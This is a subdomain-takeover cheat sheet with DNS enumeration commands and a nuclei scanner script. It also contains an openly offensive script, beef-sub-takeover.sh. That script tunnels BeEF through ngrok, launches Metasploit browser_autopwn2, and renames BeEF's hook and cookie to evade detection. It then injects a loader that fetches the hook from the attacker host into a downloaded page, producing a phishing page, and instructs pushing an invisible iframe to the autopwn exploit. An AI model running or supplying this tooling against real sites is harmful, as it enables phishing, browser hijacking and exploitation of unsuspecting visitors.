Subdomain Takeover

Checklist

Cheat Sheet

Subdomain Fuzzing

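# Brute-force subdomain names from a wordlist. The three tools are
# alternatives — run one of them, not all. WEBSITE must hold the bare apex
# domain (e.g. example.com); the guard aborts with a message if it is unset.
: "${WEBSITE:?set WEBSITE=example.com before running}"
WORDLIST=/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

# Expansions are quoted so an accidental space or glob character in the
# variable cannot turn into extra arguments (SC2086).
dnsenum "$WEBSITE" \
        -f "$WORDLIST"

dnsrecon -d "$WEBSITE" \
         -D "$WORDLIST" \
         -t brt

gobuster dns --wildcard \
             -d "$WEBSITE" \
             -w "$WORDLIST"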

DNS Recon

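# Enumerate existing records for the apex domain. WEBSITE must be set to the
# bare domain; the guard aborts with a message if it is not.
: "${WEBSITE:?set WEBSITE=example.com before running}"

# Replace "subdomain" with the host under review. A CNAME pointing at a
# third-party name that no longer exists is the condition the takeover
# checks later on this page look for.
dig CNAME "subdomain.$WEBSITE"

# The remaining tools are alternatives for the same enumeration step.
amass enum -d "$WEBSITE"

dnsenum "$WEBSITE"

dnsrecon -d "$WEBSITE"

sublist3r -d "$WEBSITE"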

Subdomain Recon

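# Resolve the domain to its A/AAAA/MX records; the address returned here is
# the TARGET used by the whois lookup below. Quoted to avoid word splitting.
host "$WEBSITE"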

IP Recon

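# Look up the owner of the IP address in TARGET. "OrgName" is the field used
# by ARIN; other registries label the owner differently (RIPE uses
# org-name/netname), so an empty result does not mean the block is unowned.
whois "$TARGET" | grep "OrgName"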

Checklist Providers

Create Script

# Any editor will do; save the script below as sub-takeover.sh.
sudo nano sub-takeover.sh
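#!/bin/bash
# sub-takeover.sh — enumerate the subdomains of DOMAIN, resolve them, and run
# the nuclei "takeover" templates against the ones that resolve.
#
# Usage: ./sub-takeover.sh [-d] <DOMAIN>
#   A leading -d is accepted so that "./sub-takeover.sh -d example.com" (the
#   form used in the run line on this page) behaves like
#   "./sub-takeover.sh example.com". The original exited at the argument
#   count check when -d was passed.
#
# Requires subfinder, shuffledns and nuclei on PATH. Root is not required by
# any of them, so the former root check is gone; running via sudo still works.
set -euo pipefail

# Print usage to stderr and exit non-zero.
usage() {
    echo "Usage: ${0##*/} [-d] <DOMAIN>" >&2
    exit 1
}

# Print an error to stderr and exit non-zero.
die() {
    echo "[-] $*" >&2
    exit 1
}

# Accept "-d DOMAIN" as well as a bare DOMAIN.
if [ "${1:-}" = "-d" ]; then
    shift
fi
[ $# -eq 1 ] || usage
DOMAIN=$1
[ -n "$DOMAIN" ] || usage

# Fail early with a clear message rather than part-way through the pipeline.
for tool in subfinder shuffledns nuclei; do
    command -v "$tool" >/dev/null 2>&1 || die "required tool not found: $tool"
done

# Private working directory instead of fixed names under /tmp: a fixed path
# can be pre-created or symlinked by another local user, which matters most
# when the script is run through sudo. Removed on every exit path.
WORKDIR=$(mktemp -d) || die "mktemp failed"
trap 'rm -rf -- "$WORKDIR"' EXIT

echo "1.1.1.1" > "$WORKDIR/resolvers.txt"

echo "[+] Finding subdomains for $DOMAIN..."
subfinder -d "$DOMAIN" -all > "$WORKDIR/available.txt"
# Stop here instead of handing an empty list to shuffledns.
[ -s "$WORKDIR/available.txt" ] || die "no subdomains found for $DOMAIN"

echo "[+] Resolving subdomains using shuffledns..."
shuffledns -d "$DOMAIN" \
           -list "$WORKDIR/available.txt" \
           -r "$WORKDIR/resolvers.txt" \
           -mode resolve \
           -o "$WORKDIR/subdomains.txt"
[ -s "$WORKDIR/subdomains.txt" ] || die "none of the subdomains of $DOMAIN resolved"

echo "[+] Checking for subdomain takeover vulnerabilities..."
nuclei -tags takeover -l "$WORKDIR/subdomains.txt"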

Run Script

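# The script takes the domain as its only positional argument — there is no
# -d flag; passing one made it exit at the argument-count check. && (not ;)
# so a failed chmod does not fall through to the run.
sudo chmod +x sub-takeover.sh && sudo ./sub-takeover.sh "$WEBSITE"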

Create Script

# Save the script below as beef-sub-takeover.sh.
sudo nano beef-sub-takeover.sh
#!/bin/bash
# beef-sub-takeover.sh — as root, rewrites the local BeEF and Metasploit
# configuration files in place, publishes BeEF through an ngrok tunnel,
# downloads the page given as the first argument and inserts a BeEF hook
# loader into it. Nothing changed under /usr/share/beef-xss is backed up or
# reverted afterwards.

RED='\e[1;31m'
GREEN='\e[1;32m'
YELLOW='\e[1;33m'
CYAN='\e[1;36m'
RESET='\e[0m'
URL='$1'

# Check for ROOT
if [[ "$(id -u)" -ne 0 ]]; then
    # NC is never defined in this script (the reset code is RESET), so the
    # colour is not reset after these messages.
    echo -e "${RED}[X] Please run as ROOT...${NC}"
    echo -e "${GREEN}[*] sudo ./takeover.sh <URL>${NC}"
    exit 1
fi

# Check for argument
if [[ $# -ne 1 ]]; then
    echo -e "${RED}[X] Please provide a URL...${NC}"
    echo -e "${GREEN}[*] sudo ./takeover.sh <URL>${NC}"
    exit 1
fi

# LAN address (first one reported by hostname -I) and the public address as
# seen by api.ipify.org.
LAN=$(hostname -I | awk '{print $1}')
WAN=$(curl -s https://api.ipify.org)

# pkill -f matches the whole command line, so any process whose arguments
# contain 'ngrok' or 'ruby' on this host is killed, not only those programs.
pkill -f 'ngrok|ruby'

# Start Metasploit in the background: msgrpc bound to the LAN address with the
# fixed password abc123 (anyone on the LAN who can reach that port gets full
# RPC control of Metasploit on this host), plus browser_autopwn2 at /pwn on
# the WAN address. ngrok is started afterwards on port 3000, where BeEF
# listens by default; output of both is discarded.
msfconsole -qx "load msgrpc ServerHost=$LAN Pass=abc123 SSL=y;use auxiliary/server/browser_autopwn2;set LHOST $WAN;set URIPATH /pwn;run -z" >/dev/null 2>&1 &
sleep 1
ngrok http 3000 &>/dev/null &
sleep 3
# Public hostname of the tunnel, read from ngrok's local API after a fixed
# 3 s wait, with the https:// prefix stripped.
NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')
printf "${GREEN}[*] ngrok started successfully...${RESET}\n"

# Rewrite BeEF's config in place. The two branches differ only in how the
# public host/port/https lines are matched: the first handles the
# commented-out defaults, the else branch values left by an earlier run.
# Both set the panel credentials to the fixed pair unk9vvn / 00980098 — the
# panel is reachable on the public ngrok hostname, so this pair guards an
# Internet-facing admin UI — and rename the default hook file and session
# cookie (hook.js -> jqueryctl.js, BEEFHOOK -> UNKSESSION); detections that
# key only on those default names will not match this deployment.
if grep -q "https: false" /usr/share/beef-xss/config.yaml; then
    sed -i -e 's|user:   "beef"|user:   "unk9vvn"|g' \
           -e 's|passwd: "beef"|passwd: "00980098"|g' \
           -e 's|# public:|public:|g' \
           -e 's|#     host: "" # public|     host: "'$NGHOST'" # public|' \
           -e 's|#     port: "" # public|     port: "443" # public|g' \
           -e 's|#     https: false|     https: true|g' \
           -e 's|allow_reverse_proxy: false|allow_reverse_proxy: true|g' \
           -e 's|hook.js|jqueryctl.js|g' \
           -e 's|BEEFHOOK|UNKSESSION|g' /usr/share/beef-xss/config.yaml
    # Point BeEF's Metasploit extension at the msgrpc started above (same LAN
    # address), and enable the browser_autopwn module and evasion extension.
    sed -i -e 's|enable: false|enable: true|g' \
           -e 's|host: "127.0.0.1"|host: "'$LAN'"|g' \
           -e 's|callback_host: "127.0.0.1"|callback_host: "'$LAN'"|g' \
           -e 's|auto_msfrpcd: false|auto_msfrpcd: true|g' /usr/share/beef-xss/extensions/metasploit/config.yaml
    sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/modules/metasploit/browser_autopwn/config.yaml
    sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/extensions/evasion/config.yaml
else
    # Same edits against a config that was already switched to https by a
    # previous run; the host/port patterns here match whatever value is
    # present rather than the commented-out defaults.
    sed -i -e 's|user:   "beef"|user:   "unk9vvn"|g' \
           -e 's|passwd: "beef"|passwd: "00980098"|g' \
           -e 's|# public:|public:|g' \
           -e 's|host: ".*" # public|host: "'$NGHOST'" # public|' \
           -e 's|port: ".*" # public|port: "443" # public|g' \
           -e 's|https: false|https: true|g' \
           -e 's|allow_reverse_proxy: false|allow_reverse_proxy: true|g' \
           -e 's|hook.js|jqueryctl.js|g' \
           -e 's|BEEFHOOK|UNKSESSION|g' /usr/share/beef-xss/config.yaml
    sed -i -e 's|enable: false|enable: true|g' \
           -e 's|host: ".*"|host: "'$LAN'"|g' \
           -e 's|callback_host: ".*"|callback_host: "'$LAN'"|g' \
           -e 's|auto_msfrpcd: false|auto_msfrpcd: true|g' /usr/share/beef-xss/extensions/metasploit/config.yaml
    sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/modules/metasploit/browser_autopwn/config.yaml
    sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/extensions/evasion/config.yaml
fi
printf "${GREEN}[*] BeEF with new configuration...${RESET}\n"

# Start BeEF in the background from its install directory; output discarded.
cd /usr/share/beef-xss && ./beef -x &>/dev/null &

# Fetch the page at URL with a spoofed Chrome user agent into the fixed path
# /tmp/index.html, overwriting whatever is already there.
wget -O /tmp/index.html -c -k -q -U \
"Mozilla/5.0 (Macintosh; Intel MacOS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" $URL

# Insert, before </body>, a loader that fetches the renamed hook
# (jqueryctl.js) from the ngrok hostname over HTTPS when the page loads.
sed -i "s|</body>|<script>function myFunction(){var x = document.createElement('SCRIPT');x.src='https://${NGHOST}/jqueryctl.js';document.body.appendChild(x);};myFunction();</script>\n</body>|g" /tmp/index.html

# Summary for the operator. The panel URL and the hardcoded credentials are
# printed in clear on the terminal.
clear
printf "\n\n"
printf "${YELLOW}Save Phishing Page: /tmp/index.html\n"
printf "\n"
printf "${CYAN}BeEF Panel: https://${NGHOST}/ui/panel${RESET}\n"
printf "${CYAN}BeEF USER: unk9vvn${RESET}\n"
printf "${CYAN}BeEF PASS: 00980098${RESET}\n"
printf "\n"
printf "${GREEN}BeEF Panel > Commands > Misc > Create Invisible Iframe > URL: http://$WAN:8080/pwn > Execute${RESET}\n"

Run Script

# Runs as root: the script rewrites the BeEF and Metasploit config files under
# /usr/share/beef-xss in place (no backup) and overwrites /tmp/index.html.
sudo chmod +x beef-sub-takeover.sh;sudo ./beef-sub-takeover.sh $WEBSITE
